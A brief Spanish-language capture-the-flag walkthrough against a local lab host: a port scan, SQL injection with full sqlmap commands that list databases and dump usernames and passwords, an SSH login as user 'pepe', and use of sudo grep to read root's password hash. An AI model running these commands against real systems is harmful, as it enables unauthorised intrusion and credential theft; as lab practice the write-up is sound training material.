realizamos un escaneo de puertos

ingresaor al servicio web

tenemos un login, lo que puede ser indicio de base de datos

siguiendo con el reconocimiento no encuentro nada y pruebo hacer un inyeccion sql

hacemos sqlmap -u "[<http://172.17.0.2/login.html>](<http://172.17.0.2/login.html>)" --form --dbs --batch

encontramos una base de datos

luego hacemos un sqlmap -u "<http://172.17.0.2/login.html>" --forms -D users -T usuarios --columns --batch

sqlmap -u "[<http://172.17.0.2/login.html>](<http://172.17.0.2/login.html>)" --forms -D users -T usuarios -C id,password,username --dump --batch

con estas credenciales pruebo entrar por ssh y consigo entrar con el usuario pepe

pruebo que puedo ejecutar como usuario pepe

vemos que podemos usar grep y probamos obtener el hash del usuario root